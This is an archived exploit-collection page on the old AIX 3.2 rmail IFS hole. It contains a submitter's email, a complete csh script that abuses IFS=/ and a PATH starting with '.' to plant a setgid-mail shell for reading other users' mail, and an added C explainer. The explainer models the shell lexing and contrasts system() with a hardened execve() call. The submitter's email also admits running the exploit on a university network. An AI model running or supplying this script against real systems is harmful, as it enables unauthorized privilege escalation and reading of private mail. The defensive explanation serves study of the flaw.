AIX rmail hole
Description: IFS attack; apparently AIX rmail may be running a command through system()
Author: Unknown
Compromise: gid mail
Vulnerable Systems: AIX 3.2, perhaps earlier
Date: 10 May 1998 (the hole itself is much older)
Notes: Thanks to the person who submitted this to me!
Date: Sun, 10 May 1998 08:34:23 PDT
From: [ CUT ]
To: fyodor@nmap.org
Subject: AIX oldie
hi fyodor,
first let me tell you that your pages are great - but you already
know that, don't you?
i noticed you have an exploit section sorted by os; here's an oldie
but goodie for AIX boxes running 3.2, the exploit gives a gid of "mail"
and therefore enables you to read the contents of /var/spool/mail etc.
i successfully tested it under AIX 3.2.5 on my university's network,
which really brought me into some trouble ;)
i guess you probably know of this ancient IFS hole; just in case you
wanted to include it in your pages ...
cya & keep up the marvelous work,
[cut]
-----------snip------------
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail.
# rmail (sgid mail) apparently runs a command line such as "/usr/..." through
# system(), i.e. through sh -c.  With IFS=/ the old Bourne shell treats "/"
# as a word separator, so the command becomes "usr", which the "." at the
# front of PATH resolves to the script created below.
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
# "usr" runs in rmail's place with egid mail: it copies the shell and makes
# the copy setgid (2777) so the group sticks for later runs.
cat <<EOF >usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .      # cp follows the link, so mailsh is a real copy of sh
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
-----------snip------------
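The hole above rests on two things: a shell that lexes the command string with IFS, and a set-gid program that hands an absolute path to that shell through system() with the caller's environment intact. The C below is an added example, not code from the submitted exploit or from AIX. It models the classic Bourne shell's lexing (a simplification; modern shells apply IFS only to expansion results, so this is not what today's /bin/sh does), shows the system() pattern the header suspects, and beside it the form a set-gid mailer should use: execve() of an absolute path with a fixed environment that carries a known PATH and no IFS. The path /usr/lib/sendmail and the recipient handling are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAX_WORDS 16

/* Copy len bytes of s into a fresh NUL-terminated string. */
static char *dup_range(const char *s, size_t len)
{
    char *d = malloc(len + 1);
    if (d == NULL) return NULL;
    memcpy(d, s, len);
    d[len] = '\0';
    return d;
}

/* Blanks separate words, and so does every character of IFS. */
static int is_sep(char c, const char *ifs)
{
    return c == ' ' || c == '\t' || c == '\n' ||
           (c != '\0' && strchr(ifs, c) != NULL);
}

/* Simplified model of how the classic Bourne shell lexed a command line.
 * Modern shells apply IFS only to expansion results; this reproduces the
 * old behaviour the rmail hole depends on, not what /bin/sh does today. */
static int old_sh_split(const char *line, const char *ifs, char **out, int max)
{
    int n = 0;
    const char *p = line;
    while (*p != '\0' && n < max) {
        while (*p != '\0' && is_sep(*p, ifs)) p++;
        if (*p == '\0') break;
        const char *start = p;
        while (*p != '\0' && !is_sep(*p, ifs)) p++;
        out[n++] = dup_range(start, (size_t)(p - start));
    }
    return n;
}

/* True if the first word of line, lexed under ifs, equals expected.
 * With ifs "/" and line "/usr/lib/sendmail -t" that word is "usr": a
 * relative name that a PATH beginning with "." resolves to ./usr. */
static int first_word_is(const char *line, const char *ifs, const char *expected)
{
    char *words[MAX_WORDS];
    int n = old_sh_split(line, ifs, words, MAX_WORDS);
    int ok = n > 0 && words[0] != NULL && strcmp(words[0], expected) == 0;
    for (int i = 0; i < n; i++) free(words[i]);
    return ok;
}

/* The pattern the page suspects rmail of using (for contrast; never called
 * here): system() runs "sh -c" with the caller's environment, so in a
 * set-gid program IFS and PATH belong to the attacker. */
static int send_mail_vulnerable(const char *rcpt)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "/usr/lib/sendmail %s", rcpt);
    return system(cmd);
}

/* Hardened form: fixed environment (known PATH, no IFS), no shell, absolute
 * path, recipient as its own argv element.  A leading '-' is rejected so the
 * recipient cannot be read as an option.  Path is an assumption. */
static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };

static int env_has_var(char *const *env, const char *name)
{
    size_t len = strlen(name);
    for (; *env != NULL; env++)
        if (strncmp(*env, name, len) == 0 && (*env)[len] == '=')
            return 1;
    return 0;
}

static int send_mail_safe(const char *rcpt)
{
    if (rcpt == NULL || rcpt[0] == '\0' || rcpt[0] == '-') return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "/usr/lib/sendmail", (char *)rcpt, NULL };
        execve("/usr/lib/sendmail", argv, clean_env);
        _exit(127);              /* exec failed: report as a shell would */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    printf("IFS=/ turns \"/usr/lib/sendmail -t\" into command \"usr\": %d\n",
           first_word_is("/usr/lib/sendmail -t", "/", "usr"));
    printf("clean_env carries IFS: %d\n", env_has_var(clean_env, "IFS"));
    (void)send_mail_vulnerable;  /* kept only to show the bad pattern */
    return 0;
}
```

The split model is the whole story of the exploit script: under IFS=/ the first token of the sendmail command is the relative name "usr", and PATH=.:$PATH hands it to /tmp/.rmail/usr. The fix is not to filter IFS alone; a set-id program should drop the inherited environment entirely and never let a shell parse its command.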
This page is part of Fyodor's exploit world.